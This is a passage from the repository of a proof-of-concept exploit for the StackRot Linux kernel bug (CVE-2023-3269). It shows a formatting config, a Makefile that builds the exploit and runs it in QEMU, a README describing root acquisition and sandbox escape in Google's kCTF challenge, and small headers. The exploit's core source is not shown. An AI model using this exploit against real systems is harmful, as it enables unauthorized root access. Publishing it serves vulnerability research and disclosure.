'bio_for_each_segment_all' 104 | - 'bio_list_for_each' 105 | - 'bip_for_each_vec' 106 | - 'bond_for_each_slave' 107 | - 'bond_for_each_slave_rcu' 108 | - 'bpf__perf_for_each_map' 109 | - 'bpf__perf_for_each_map_named' 110 | - 'bpf_for_each_spilled_reg' 111 | - 'bpf_object__for_each_map' 112 | - 'bpf_object__for_each_program' 113 | - 'bpf_object__for_each_safe' 114 | - 'bpf_perf_object__for_each' 115 | - 'btree_for_each_safe128' 116 | - 'btree_for_each_safe32' 117 | - 'btree_for_each_safe64' 118 | - 'btree_for_each_safel' 119 | - 'card_for_each_dev' 120 | - 'cgroup_taskset_for_each' 121 | - 'cgroup_taskset_for_each_leader' 122 | - 'cpufreq_for_each_efficient_entry_idx' 123 | - 'cpufreq_for_each_entry' 124 | - 'cpufreq_for_each_entry_idx' 125 | - 'cpufreq_for_each_valid_entry' 126 | - 'cpufreq_for_each_valid_entry_idx' 127 | - 'css_for_each_child' 128 | - 'css_for_each_descendant_post' 129 | - 'css_for_each_descendant_pre' 130 | - 'damon_for_each_region' 131 | - 'damon_for_each_region_safe' 132 | - 'damon_for_each_scheme' 133 | - 'damon_for_each_scheme_safe' 134 | - 'damon_for_each_target' 135 | - 'damon_for_each_target_safe' 136 | - 'data__for_each_file' 137 | - 'data__for_each_file_new' 138 | - 'data__for_each_file_start' 139 | - 'device_for_each_child_node' 140 | - 'displayid_iter_for_each' 141 | - 'dma_fence_array_for_each' 142 | - 'dma_fence_chain_for_each' 143 | - 'dma_fence_unwrap_for_each' 144 | - 'dma_resv_for_each_fence' 145 | - 'dma_resv_for_each_fence_unlocked' 146 | - 'do_for_each_ftrace_op' 147 | - 'drm_atomic_crtc_for_each_plane' 148 | - 'drm_atomic_crtc_state_for_each_plane' 149 | - 'drm_atomic_crtc_state_for_each_plane_state' 150 | - 'drm_atomic_for_each_plane_damage' 151 | - 'drm_client_for_each_connector_iter' 152 | - 'drm_client_for_each_modeset' 153 | - 'drm_connector_for_each_possible_encoder' 154 | - 'drm_for_each_bridge_in_chain' 155 | - 'drm_for_each_connector_iter' 156 | - 'drm_for_each_crtc' 157 | - 'drm_for_each_crtc_reverse' 158 | - 'drm_for_each_encoder' 159 | - 'drm_for_each_encoder_mask' 160 | - 'drm_for_each_fb' 161 | - 'drm_for_each_legacy_plane' 162 | - 'drm_for_each_plane' 163 | - 'drm_for_each_plane_mask' 164 | - 'drm_for_each_privobj' 165 | - 'drm_mm_for_each_hole' 166 | - 'drm_mm_for_each_node' 167 | - 'drm_mm_for_each_node_in_range' 168 | - 'drm_mm_for_each_node_safe' 169 | - 'dsa_switch_for_each_available_port' 170 | - 'dsa_switch_for_each_cpu_port' 171 | - 'dsa_switch_for_each_port' 172 | - 'dsa_switch_for_each_port_continue_reverse' 173 | - 'dsa_switch_for_each_port_safe' 174 | - 'dsa_switch_for_each_user_port' 175 | - 'dsa_tree_for_each_user_port' 176 | - 'dso__for_each_symbol' 177 | - 'dsos__for_each_with_build_id' 178 | - 'elf_hash_for_each_possible' 179 | - 'elf_section__for_each_rel' 180 | - 'elf_section__for_each_rela' 181 | - 'elf_symtab__for_each_symbol' 182 | - 'evlist__for_each_cpu' 183 | - 'evlist__for_each_entry' 184 | - 'evlist__for_each_entry_continue' 185 | - 'evlist__for_each_entry_from' 186 | - 'evlist__for_each_entry_reverse' 187 | - 'evlist__for_each_entry_safe' 188 | - 'flow_action_for_each' 189 | - 'for_each_acpi_dev_match' 190 | - 'for_each_active_dev_scope' 191 | - 'for_each_active_drhd_unit' 192 | - 'for_each_active_iommu' 193 | - 'for_each_active_route' 194 | - 'for_each_aggr_pgid' 195 | - 'for_each_available_child_of_node' 196 | - 'for_each_bench' 197 | - 'for_each_bio' 198 | - 'for_each_board_func_rsrc' 199 | - 'for_each_btf_ext_rec' 200 | - 'for_each_btf_ext_sec' 201 | - 'for_each_bvec' 202 | - 'for_each_card_auxs' 203 | - 'for_each_card_auxs_safe' 204 | - 'for_each_card_components' 205 | - 'for_each_card_dapms' 206 | - 'for_each_card_pre_auxs' 207 | - 'for_each_card_prelinks' 208 | - 'for_each_card_rtds' 209 | - 'for_each_card_rtds_safe' 210 | - 'for_each_card_widgets' 211 | - 'for_each_card_widgets_safe' 212 | - 'for_each_cgroup_storage_type' 213 | - 'for_each_child_of_node' 214 | - 'for_each_clear_bit' 215 | - 'for_each_clear_bit_from' 216 | - 'for_each_clear_bitrange' 217 | - 'for_each_clear_bitrange_from' 218 | - 'for_each_cmd' 219 | - 'for_each_cmsghdr' 220 | - 'for_each_collection' 221 | - 'for_each_comp_order' 222 | - 'for_each_compatible_node' 223 | - 'for_each_component_dais' 224 | - 'for_each_component_dais_safe' 225 | - 'for_each_console' 226 | - 'for_each_console_srcu' 227 | - 'for_each_cpu' 228 | - 'for_each_cpu_and' 229 | - 'for_each_cpu_wrap' 230 | - 'for_each_dapm_widgets' 231 | - 'for_each_dedup_cand' 232 | - 'for_each_dev_addr' 233 | - 'for_each_dev_scope' 234 | - 'for_each_dma_cap_mask' 235 | - 'for_each_dpcm_be' 236 | - 'for_each_dpcm_be_rollback' 237 | - 'for_each_dpcm_be_safe' 238 | - 'for_each_dpcm_fe' 239 | - 'for_each_drhd_unit' 240 | - 'for_each_dss_dev' 241 | - 'for_each_efi_memory_desc' 242 | - 'for_each_efi_memory_desc_in_map' 243 | - 'for_each_element' 244 | - 'for_each_element_extid' 245 | - 'for_each_element_id' 246 | - 'for_each_endpoint_of_node' 247 | - 'for_each_event' 248 | - 'for_each_event_tps' 249 | - 'for_each_evictable_lru' 250 | - 'for_each_fib6_node_rt_rcu' 251 | - 'for_each_fib6_walker_rt' 252 | - 'for_each_free_mem_pfn_range_in_zone' 253 | - 'for_each_free_mem_pfn_range_in_zone_from' 254 | - 'for_each_free_mem_range' 255 | - 'for_each_free_mem_range_reverse' 256 | - 'for_each_func_rsrc' 257 | - 'for_each_group_device' 258 | - 'for_each_group_evsel' 259 | - 'for_each_group_member' 260 | - 'for_each_hstate' 261 | - 'for_each_if' 262 | - 'for_each_inject_fn' 263 | - 'for_each_insn' 264 | - 'for_each_insn_prefix' 265 | - 'for_each_intid' 266 | - 'for_each_iommu' 267 | - 'for_each_ip_tunnel_rcu' 268 | - 'for_each_irq_nr' 269 | - 'for_each_lang' 270 | - 'for_each_link_codecs' 271 | - 'for_each_link_cpus' 272 | - 'for_each_link_platforms' 273 | - 'for_each_lru' 274 | - 'for_each_matching_node' 275 | - 'for_each_matching_node_and_match' 276 | - 'for_each_mem_pfn_range' 277 | - 'for_each_mem_range' 278 | - 'for_each_mem_range_rev' 279 | - 'for_each_mem_region' 280 | - 'for_each_member' 281 | - 'for_each_memory' 282 | - 'for_each_migratetype_order' 283 | - 'for_each_missing_reg' 284 | - 'for_each_net' 285 | - 'for_each_net_continue_reverse' 286 | - 'for_each_net_rcu' 287 | - 'for_each_netdev' 288 | - 'for_each_netdev_continue' 289 | - 'for_each_netdev_continue_rcu' 290 | - 'for_each_netdev_continue_reverse' 291 | - 'for_each_netdev_feature' 292 | - 'for_each_netdev_in_bond_rcu' 293 | - 'for_each_netdev_rcu' 294 | - 'for_each_netdev_reverse' 295 | - 'for_each_netdev_safe' 296 | - 'for_each_new_connector_in_state' 297 | - 'for_each_new_crtc_in_state' 298 | - 'for_each_new_mst_mgr_in_state' 299 | - 'for_each_new_plane_in_state' 300 | - 'for_each_new_plane_in_state_reverse' 301 | - 'for_each_new_private_obj_in_state' 302 | - 'for_each_new_reg' 303 | - 'for_each_node' 304 | - 'for_each_node_by_name' 305 | - 'for_each_node_by_type' 306 | - 'for_each_node_mask' 307 | - 'for_each_node_state' 308 | - 'for_each_node_with_cpus' 309 | - 'for_each_node_with_property' 310 | - 'for_each_nonreserved_multicast_dest_pgid' 311 | - 'for_each_of_allnodes' 312 | - 'for_each_of_allnodes_from' 313 | - 'for_each_of_cpu_node' 314 | - 'for_each_of_pci_range' 315 | - 'for_each_old_connector_in_state' 316 | - 'for_each_old_crtc_in_state' 317 | - 'for_each_old_mst_mgr_in_state' 318 | - 'for_each_old_plane_in_state' 319 | - 'for_each_old_private_obj_in_state' 320 | - 'for_each_oldnew_connector_in_state' 321 | - 'for_each_oldnew_crtc_in_state' 322 | - 'for_each_oldnew_mst_mgr_in_state' 323 | - 'for_each_oldnew_plane_in_state' 324 | - 'for_each_oldnew_plane_in_state_reverse' 325 | - 'for_each_oldnew_private_obj_in_state' 326 | - 'for_each_online_cpu' 327 | - 'for_each_online_node' 328 | - 'for_each_online_pgdat' 329 | - 'for_each_path' 330 | - 'for_each_pci_bridge' 331 | - 'for_each_pci_dev' 332 | - 'for_each_pcm_streams' 333 | - 'for_each_physmem_range' 334 | - 'for_each_populated_zone' 335 | - 'for_each_possible_cpu' 336 | - 'for_each_present_cpu' 337 | - 'for_each_prime_number' 338 | - 'for_each_prime_number_from' 339 | - 'for_each_probe_cache_entry' 340 | - 'for_each_process' 341 | - 'for_each_process_thread' 342 | - 'for_each_prop_codec_conf' 343 | - 'for_each_prop_dai_codec' 344 | - 'for_each_prop_dai_cpu' 345 | - 'for_each_prop_dlc_codecs' 346 | - 'for_each_prop_dlc_cpus' 347 | - 'for_each_prop_dlc_platforms' 348 | - 'for_each_property_of_node' 349 | - 'for_each_reg' 350 | - 'for_each_reg_filtered' 351 | - 'for_each_registered_fb' 352 | - 'for_each_requested_gpio' 353 | - 'for_each_requested_gpio_in_range' 354 | - 'for_each_reserved_mem_range' 355 | - 'for_each_reserved_mem_region' 356 | - 'for_each_rtd_codec_dais' 357 | - 'for_each_rtd_components' 358 | - 'for_each_rtd_cpu_dais' 359 | - 'for_each_rtd_dais' 360 | - 'for_each_script' 361 | - 'for_each_sec' 362 | - 'for_each_set_bit' 363 | - 'for_each_set_bit_from' 364 | - 'for_each_set_bitrange' 365 | - 'for_each_set_bitrange_from' 366 | - 'for_each_set_clump8' 367 | - 'for_each_sg' 368 | - 'for_each_sg_dma_page' 369 | - 'for_each_sg_page' 370 | - 'for_each_sgtable_dma_page' 371 | - 'for_each_sgtable_dma_sg' 372 | - 'for_each_sgtable_page' 373 | - 'for_each_sgtable_sg' 374 | - 'for_each_shell_test' 375 | - 'for_each_sibling_event' 376 | - 'for_each_subelement' 377 | - 'for_each_subelement_extid' 378 | - 'for_each_subelement_id' 379 | - 'for_each_sublist' 380 | - 'for_each_subsystem' 381 | - 'for_each_supported_activate_fn' 382 | - 'for_each_supported_inject_fn' 383 | - 'for_each_test' 384 | - 'for_each_thread' 385 | - 'for_each_token' 386 | - 'for_each_unicast_dest_pgid' 387 | - 'for_each_vsi' 388 | - 'for_each_wakeup_source' 389 | - 'for_each_zone' 390 | - 'for_each_zone_zonelist' 391 | - 'for_each_zone_zonelist_nodemask' 392 | - 'func_for_each_insn' 393 | - 'fwnode_for_each_available_child_node' 394 | - 'fwnode_for_each_child_node' 395 | - 'fwnode_graph_for_each_endpoint' 396 | - 'gadget_for_each_ep' 397 | - 'genradix_for_each' 398 | - 'genradix_for_each_from' 399 | - 'hash_for_each' 400 | - 'hash_for_each_possible' 401 | - 'hash_for_each_possible_rcu' 402 | - 'hash_for_each_possible_rcu_notrace' 403 | - 'hash_for_each_possible_safe' 404 | - 'hash_for_each_rcu' 405 | - 'hash_for_each_safe' 406 | - 'hashmap__for_each_entry' 407 | - 'hashmap__for_each_entry_safe' 408 | - 'hashmap__for_each_key_entry' 409 | - 'hashmap__for_each_key_entry_safe' 410 | - 'hctx_for_each_ctx' 411 | - 'hists__for_each_format' 412 | - 'hists__for_each_sort_list' 413 | - 'hlist_bl_for_each_entry' 414 | - 'hlist_bl_for_each_entry_rcu' 415 | - 'hlist_bl_for_each_entry_safe' 416 | - 'hlist_for_each' 417 | - 'hlist_for_each_entry' 418 | - 'hlist_for_each_entry_continue' 419 | - 'hlist_for_each_entry_continue_rcu' 420 | - 'hlist_for_each_entry_continue_rcu_bh' 421 | - 'hlist_for_each_entry_from' 422 | - 'hlist_for_each_entry_from_rcu' 423 | - 'hlist_for_each_entry_rcu' 424 | - 'hlist_for_each_entry_rcu_bh' 425 | - 'hlist_for_each_entry_rcu_notrace' 426 | - 'hlist_for_each_entry_safe' 427 | - 'hlist_for_each_entry_srcu' 428 | - 'hlist_for_each_safe' 429 | - 'hlist_nulls_for_each_entry' 430 | - 'hlist_nulls_for_each_entry_from' 431 | - 'hlist_nulls_for_each_entry_rcu' 432 | - 'hlist_nulls_for_each_entry_safe' 433 | - 'i3c_bus_for_each_i2cdev' 434 | - 'i3c_bus_for_each_i3cdev' 435 | - 'idr_for_each_entry' 436 | - 'idr_for_each_entry_continue' 437 | - 'idr_for_each_entry_continue_ul' 438 | - 'idr_for_each_entry_ul' 439 | - 'in_dev_for_each_ifa_rcu' 440 | - 'in_dev_for_each_ifa_rtnl' 441 | - 'inet_bind_bucket_for_each' 442 | - 'inet_lhash2_for_each_icsk' 443 | - 'inet_lhash2_for_each_icsk_continue' 444 | - 'inet_lhash2_for_each_icsk_rcu' 445 | - 'interval_tree_for_each_double_span' 446 | - 'interval_tree_for_each_span' 447 | - 'intlist__for_each_entry' 448 | - 'intlist__for_each_entry_safe' 449 | - 'iopt_for_each_contig_area' 450 | - 'kcore_copy__for_each_phdr' 451 | - 'key_for_each' 452 | - 'key_for_each_safe' 453 | - 'klp_for_each_func' 454 | - 'klp_for_each_func_safe' 455 | - 'klp_for_each_func_static' 456 | - 'klp_for_each_object' 457 | - 'klp_for_each_object_safe' 458 | - 'klp_for_each_object_static' 459 | - 'kunit_suite_for_each_test_case' 460 | - 'kvm_for_each_memslot' 461 | - 'kvm_for_each_memslot_in_gfn_range' 462 | - 'kvm_for_each_vcpu' 463 | - 'libbpf_nla_for_each_attr' 464 | - 'list_for_each' 465 | - 'list_for_each_codec' 466 | - 'list_for_each_codec_safe' 467 | - 'list_for_each_continue' 468 | - 'list_for_each_entry' 469 | - 'list_for_each_entry_continue' 470 | - 'list_for_each_entry_continue_rcu' 471 | - 'list_for_each_entry_continue_reverse' 472 | - 'list_for_each_entry_from' 473 | - 'list_for_each_entry_from_rcu' 474 | - 'list_for_each_entry_from_reverse' 475 | - 'list_for_each_entry_lockless' 476 | - 'list_for_each_entry_rcu' 477 | - 'list_for_each_entry_reverse' 478 | - 'list_for_each_entry_safe' 479 | - 'list_for_each_entry_safe_continue' 480 | - 'list_for_each_entry_safe_from' 481 | - 'list_for_each_entry_safe_reverse' 482 | - 'list_for_each_entry_srcu' 483 | - 'list_for_each_from' 484 | - 'list_for_each_prev' 485 | - 'list_for_each_prev_safe' 486 | - 'list_for_each_safe' 487 | - 'llist_for_each' 488 | - 'llist_for_each_entry' 489 | - 'llist_for_each_entry_safe' 490 | - 'llist_for_each_safe' 491 | - 'map__for_each_symbol' 492 | - 'map__for_each_symbol_by_name' 493 | - 'map_for_each_event' 494 | - 'map_for_each_metric' 495 | - 'maps__for_each_entry' 496 | - 'maps__for_each_entry_safe' 497 | - 'mci_for_each_dimm' 498 | - 'media_device_for_each_entity' 499 | - 'media_device_for_each_intf' 500 | - 'media_device_for_each_link' 501 | - 'media_device_for_each_pad' 502 | - 'msi_for_each_desc' 503 | - 'nanddev_io_for_each_page' 504 | - 'netdev_for_each_lower_dev' 505 | - 'netdev_for_each_lower_private' 506 | - 'netdev_for_each_lower_private_rcu' 507 | - 'netdev_for_each_mc_addr' 508 | - 'netdev_for_each_uc_addr' 509 | - 'netdev_for_each_upper_dev_rcu' 510 | - 'netdev_hw_addr_list_for_each' 511 | - 'nft_rule_for_each_expr' 512 | - 'nla_for_each_attr' 513 | - 'nla_for_each_nested' 514 | - 'nlmsg_for_each_attr' 515 | - 'nlmsg_for_each_msg' 516 | - 'nr_neigh_for_each' 517 | - 'nr_neigh_for_each_safe' 518 | - 'nr_node_for_each' 519 | - 'nr_node_for_each_safe' 520 | - 'of_for_each_phandle' 521 | - 'of_property_for_each_string' 522 | - 'of_property_for_each_u32' 523 | - 'pci_bus_for_each_resource' 524 | - 'pci_dev_for_each_resource' 525 | - 'pcl_for_each_chunk' 526 | - 'pcl_for_each_segment' 527 | - 'pcm_for_each_format' 528 | - 'perf_config_items__for_each_entry' 529 | - 'perf_config_sections__for_each_entry' 530 | - 'perf_config_set__for_each_entry' 531 | - 'perf_cpu_map__for_each_cpu' 532 | - 'perf_evlist__for_each_entry' 533 | - 'perf_evlist__for_each_entry_reverse' 534 | - 'perf_evlist__for_each_entry_safe' 535 | - 'perf_evlist__for_each_evsel' 536 | - 'perf_evlist__for_each_mmap' 537 | - 'perf_hpp_list__for_each_format' 538 | - 'perf_hpp_list__for_each_format_safe' 539 | - 'perf_hpp_list__for_each_sort_list' 540 | - 'perf_hpp_list__for_each_sort_list_safe' 541 | - 'perf_pmu__for_each_hybrid_pmu' 542 | - 'ping_portaddr_for_each_entry' 543 | - 'ping_portaddr_for_each_entry_rcu' 544 | - 'plist_for_each' 545 | - 'plist_for_each_continue' 546 | - 'plist_for_each_entry' 547 | - 'plist_for_each_entry_continue' 548 | - 'plist_for_each_entry_safe' 549 | - 'plist_for_each_safe' 550 | - 'pnp_for_each_card' 551 | - 'pnp_for_each_dev' 552 | - 'protocol_for_each_card' 553 | - 'protocol_for_each_dev' 554 | - 'queue_for_each_hw_ctx' 555 | - 'radix_tree_for_each_slot' 556 | - 'radix_tree_for_each_tagged' 557 | - 'rb_for_each' 558 | - 'rbtree_postorder_for_each_entry_safe' 559 | - 'rdma_for_each_block' 560 | - 'rdma_for_each_port' 561 | - 'rdma_umem_for_each_dma_block' 562 | - 'resort_rb__for_each_entry' 563 | - 'resource_list_for_each_entry' 564 | - 'resource_list_for_each_entry_safe' 565 | - 'rhl_for_each_entry_rcu' 566 | - 'rhl_for_each_rcu' 567 | - 'rht_for_each' 568 | - 'rht_for_each_entry' 569 | - 'rht_for_each_entry_from' 570 | - 'rht_for_each_entry_rcu' 571 | - 'rht_for_each_entry_rcu_from' 572 | - 'rht_for_each_entry_safe' 573 | - 'rht_for_each_from' 574 | - 'rht_for_each_rcu' 575 | - 'rht_for_each_rcu_from' 576 | - 'rq_for_each_bvec' 577 | - 'rq_for_each_segment' 578 | - 'rq_list_for_each' 579 | - 'rq_list_for_each_safe' 580 | - 'scsi_for_each_prot_sg' 581 | - 'scsi_for_each_sg' 582 | - 'sctp_for_each_hentry' 583 | - 'sctp_skb_for_each' 584 | - 'sec_for_each_insn' 585 | - 'sec_for_each_insn_continue' 586 | - 'sec_for_each_insn_from' 587 | - 'shdma_for_each_chan' 588 | - 'shost_for_each_device' 589 | - 'sk_for_each' 590 | - 'sk_for_each_bound' 591 | - 'sk_for_each_entry_offset_rcu' 592 | - 'sk_for_each_from' 593 | - 'sk_for_each_rcu' 594 | - 'sk_for_each_safe' 595 | - 'sk_nulls_for_each' 596 | - 'sk_nulls_for_each_from' 597 | - 'sk_nulls_for_each_rcu' 598 | - 'snd_array_for_each' 599 | - 'snd_pcm_group_for_each_entry' 600 | - 'snd_soc_dapm_widget_for_each_path' 601 | - 'snd_soc_dapm_widget_for_each_path_safe' 602 | - 'snd_soc_dapm_widget_for_each_sink_path' 603 | - 'snd_soc_dapm_widget_for_each_source_path' 604 | - 'strlist__for_each_entry' 605 | - 'strlist__for_each_entry_safe' 606 | - 'sym_for_each_insn' 607 | - 'sym_for_each_insn_continue_reverse' 608 | - 'symbols__for_each_entry' 609 | - 'tb_property_for_each' 610 | - 'tcf_act_for_each_action' 611 | - 'tcf_exts_for_each_action' 612 | - 'udp_portaddr_for_each_entry' 613 | - 'udp_portaddr_for_each_entry_rcu' 614 | - 'usb_hub_for_each_child' 615 | - 'v4l2_device_for_each_subdev' 616 | - 'v4l2_m2m_for_each_dst_buf' 617 | - 'v4l2_m2m_for_each_dst_buf_safe' 618 | - 'v4l2_m2m_for_each_src_buf' 619 | - 'v4l2_m2m_for_each_src_buf_safe' 620 | - 'virtio_device_for_each_vq' 621 | - 'while_for_each_ftrace_op' 622 | - 'xa_for_each' 623 | - 'xa_for_each_marked' 624 | - 'xa_for_each_range' 625 | - 'xa_for_each_start' 626 | - 'xas_for_each' 627 | - 'xas_for_each_conflict' 628 | - 'xas_for_each_marked' 629 | - 'xbc_array_for_each_value' 630 | - 'xbc_for_each_key_value' 631 | - 'xbc_node_for_each_array_value' 632 | - 'xbc_node_for_each_child' 633 | - 'xbc_node_for_each_key_value' 634 | - 'xbc_node_for_each_subkey' 635 | - 'zorro_for_each_dev' 636 | 637 | IncludeBlocks: Preserve 638 | IncludeCategories: 639 | - Regex: '.*' 640 | Priority: 1 641 | IncludeIsMainRegex: '(Test)?$' 642 | IndentCaseLabels: false 643 | IndentGotoLabels: false 644 | IndentPPDirectives: None 645 | IndentWidth: 8 646 | IndentWrappedFunctionNames: false 647 | JavaScriptQuotes: Leave 648 | JavaScriptWrapImports: true 649 | KeepEmptyLinesAtTheStartOfBlocks: false 650 | MacroBlockBegin: '' 651 | MacroBlockEnd: '' 652 | MaxEmptyLinesToKeep: 1 653 | NamespaceIndentation: None 654 | ObjCBinPackProtocolList: Auto 655 | ObjCBlockIndentWidth: 8 656 | ObjCSpaceAfterProperty: true 657 | ObjCSpaceBeforeProtocolList: true 658 | 659 | # Taken from git's rules 660 | PenaltyBreakAssignment: 10 661 | PenaltyBreakBeforeFirstCallParameter: 30 662 | PenaltyBreakComment: 10 663 | PenaltyBreakFirstLessLess: 0 664 | PenaltyBreakString: 10 665 | PenaltyExcessCharacter: 100 666 | PenaltyReturnTypeOnItsOwnLine: 60 667 | 668 | PointerAlignment: Right 669 | ReflowComments: false 670 | SortIncludes: false 671 | SortUsingDeclarations: false 672 | SpaceAfterCStyleCast: false 673 | SpaceAfterTemplateKeyword: true 674 | SpaceBeforeAssignmentOperators: true 675 | SpaceBeforeCtorInitializerColon: true 676 | SpaceBeforeInheritanceColon: true 677 | SpaceBeforeParens: ControlStatementsExceptForEachMacros 678 | SpaceBeforeRangeBasedForLoopColon: true 679 | SpaceInEmptyParentheses: false 680 | SpacesBeforeTrailingComments: 1 681 | SpacesInAngles: false 682 | SpacesInContainerLiterals: false 683 | SpacesInCStyleCastParentheses: false 684 | SpacesInParentheses: false 685 | SpacesInSquareBrackets: false 686 | Standard: Cpp03 687 | TabWidth: 8 688 | UseTab: Always 689 | 690 | AlignConsecutiveMacros: true 691 | ... 692 | -------------------------------------------------------------------------------- /exp/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := ../env/exp/exploit 2 | LINKSCRIPT := linkscript.lds 3 | 4 | CC := gcc 5 | CFLAGS := -fno-asynchronous-unwind-tables -fno-ident -fno-stack-protector \ 6 | -no-pie -s -Os -nostdlib -static -Wl,-T$(LINKSCRIPT) -lgcc -Wall 7 | 8 | MAIN_C := src/main.c 9 | SOURCES := \ 10 | consts/log.h \ 11 | consts/prog_regions.h \ 12 | consts/stack.h \ 13 | consts/paging.h \ 14 | consts/msg.h \ 15 | src/nodes_master_and_use.h \ 16 | src/node_free.c \ 17 | src/nodes_decl.h \ 18 | src/nodes_master_and_free.h \ 19 | src/nodes_master_free_use.h \ 20 | src/main.c \ 21 | src/nodes_free_and_use.h \ 22 | src/node_master.c \ 23 | src/node_use.c \ 24 | sys/uio.h \ 25 | sys/msg.h \ 26 | sysutil/clone.h \ 27 | sysutil/mbarrier.h \ 28 | sysutil/pin_cpu.h \ 29 | utils/string.h 30 | 31 | ECHO := echo -e '\t' 32 | TEE := tee 33 | GREP := grep -oha 34 | 35 | RM := rm -f 36 | 37 | CFMT := clang-format 38 | CFMTFIX := $(CFMT) -i 39 | CFMTCHK := $(CFMT) -n --Werror 40 | 41 | KVM ?= -enable-kvm 42 | 43 | QEMU := qemu-system-x86_64 44 | QFLAGS := \ 45 | -m 3G -smp 2 $(KVM) \ 46 | -kernel ../env/bzImage_upstream_6.1.25 \ 47 | -initrd ../env/initramfs.cpio.gz \ 48 | -append "init=/init console=ttyS0 panic_on_warn=1" \ 49 | -virtfs local,path=../env/exp,mount_tag=exp,security_model=none \ 50 | -nographic -no-reboot 51 | 52 | OUT := ../env/run.out 53 | FLAG := 'flag{[a-zA-Z0-9_-]*}' 54 | 55 | .PHONY: 56 | all: $(TARGET) 57 | 58 | $(TARGET): $(SOURCES) $(LINKSCRIPT) 59 | @$(ECHO) CC $(TARGET) 60 | @$(CC) -o $(TARGET) $(MAIN_C) $(CFLAGS) 61 | 62 | .PHONY: 63 | clean: 64 | @$(ECHO) RM $(TARGET) 65 | @$(RM) $(TARGET) 66 | @$(ECHO) RM $(OUT) 67 | @$(RM) $(OUT) 68 | 69 | .PHONY: 70 | fmt: 71 | @$(ECHO) FMT $(SOURCES) 72 | @$(CFMTFIX) $(SOURCES) 73 | 74 | .PHONY: 75 | check: 76 | @$(ECHO) CHECK $(SOURCES) 77 | @$(CFMTCHK) $(SOURCES) 78 | 79 | .PHONY: 80 | run: $(TARGET) 81 | @$(ECHO) QEMU $(TARGET) 82 | @$(QEMU) $(QFLAGS) | $(TEE) $(OUT) 83 | @$(ECHO) SEARCH FLAG 84 | @$(GREP) $(FLAG) $(OUT) 85 | -------------------------------------------------------------------------------- /exp/README.md: -------------------------------------------------------------------------------- 1 | # Exploiting StackRot (CVE-2023-3269) 2 | 3 | [![GitHub CI](https://github.com/lrh2000/StackRot/actions/workflows/ci.yml/badge.svg)][ci] 4 | 5 | [ci]: https://github.com/lrh2000/StackRot/actions 6 | 7 | This contains a Proof of Concept (PoC) exploit for the StackRot bug. For a 8 | detailed explanation of the vulnerability and a walkthrough of how this exploit 9 | was developed, please refer to [this](/). 10 | 11 | The exploit specifically targets Linux kernel version 6.1.25. It is primarily 12 | used to acquire root privileges and escape sandboxes in the Google kCTF VRP 13 | challenge. The kernel image and the kernel configuration can be found 14 | [here](/env). 15 | 16 | The successful execution of the exploit, resulting in the acquisition of root 17 | privileges, is verified by the [GitHub CI][ci], which runs the exploit within 18 | QEMU using the specified kernel images. 19 | 20 | ## Building and running the exploit 21 | 22 | To build the exploit, execute the following command: 23 | ``` 24 | make 25 | ``` 26 | 27 | Given that QEMU is installed, the exploit can be tested with: 28 | ``` 29 | make run 30 | ``` 31 | If KVM is unavailable, substitute the previous command with: 32 | ``` 33 | make run KVM= 34 | ``` 35 | 36 | The most straightforward way to understand how this exploit operates without 37 | having to set up a local environment is by reviewing the GitHub CI pass 38 | procedure, which can be found [here][ci]. 39 | 40 | ## Contributing 41 | 42 | While it's unlikely that many will be interested in contributing code to a PoC 43 | exploit, the contribution guidelines are still presented here. 44 | 45 | Please ensure that the contributed code adheres to the proper formatting 46 | standards. This can be achieved by executing: 47 | ``` 48 | make fmt 49 | ``` 50 | 51 | To verify that the code conforms to the specified formatting, execute: 52 | ``` 53 | make check 54 | ``` 55 | 56 | ## Notes 57 | 58 | Currently, the exploit implementation considers a two-CPU situation and 59 | therefore assumes 16 as the number of maple nodes per slab, where the latter 60 | value depends on the number of CPUs. This means that the exploit will not work 61 | out of the box if the number of CPUs is not two. However, by adjusting a few 62 | parameters, it should not be difficult to get the exploit to work on any number 63 | of CPUs greater than one. 64 | -------------------------------------------------------------------------------- /exp/consts/log.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define L_ERROR "\x1B[31m" 4 | #define L_DOING "\x1B[0m" 5 | #define L_DONE "\x1B[32m" 6 | 7 | #define A_SUCC "\\x1B[35m" 8 | #define A_RESET "\\x1B[0m" 9 | -------------------------------------------------------------------------------- /exp/consts/msg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define KERNEL_MSGHDR_SIZE (6 * 8) 4 | #define USERSPACE_MSGHDR_SIZE 8 5 | 6 | struct msg_hdr { 7 | unsigned long type; 8 | char data[0]; 9 | }; 10 | -------------------------------------------------------------------------------- /exp/consts/paging.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define PAGE_SIZE 0x1000UL 4 | #define PAGE_MASK 0x0fffUL 5 | #define PAGE_ALIGN(val) (((val) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)) 6 | 7 | #define TASK_SIZE 0x800000000000UL 8 | 9 | #define LEAF_PAGES 512 10 | -------------------------------------------------------------------------------- /exp/consts/prog_regions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | extern char __text_start[]; 4 | extern char __text_end[]; 5 | 6 | extern char __data_start[]; 7 | extern char __data_end[]; 8 | -------------------------------------------------------------------------------- /exp/consts/stack.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define COMMON_STACK_SIZE 2048 4 | #define STACK_ALIGNED __attribute__((aligned(16))) 5 | -------------------------------------------------------------------------------- /exp/linkscript.lds: -------------------------------------------------------------------------------- 1 | ENTRY(_start) 2 | 3 | SECTIONS 4 | { 5 | . = 0x40000; 6 | 7 | __text_start = .; 8 | 9 | .text : 10 | { 11 | *(.text) *(.text.*) 12 | *(.rodata) *(.rodata.*) 13 | } 14 | 15 | __text_end = .; 16 | 17 | . = ALIGN(4096); 18 | 19 | __data_start = .; 20 | 21 | .data : 22 | { 23 | *(.data) *(.data.*) 24 | *(.bss) *(.bss.*) 25 | } 26 | 27 | __data_end = .; 28 | 29 | /DISCARD/ : { *(*) } 30 | } 31 | -------------------------------------------------------------------------------- /exp/nolibc/Makefile: -------------------------------------------------------------------------------- 1 | # SPDX-License-Identifier: GPL-2.0 2 | # Makefile for nolibc installation and tests 3 | include ../../scripts/Makefile.include 4 | 5 | # we're in ".../tools/include/nolibc" 6 | ifeq ($(srctree),) 7 | srctree := $(patsubst %/tools/include/,%,$(dir $(CURDIR))) 8 | endif 9 | 10 | # when run as make -C tools/ nolibc_ the arch is not set 11 | ifeq ($(ARCH),) 12 | include $(srctree)/scripts/subarch.include 13 | ARCH = $(SUBARCH) 14 | endif 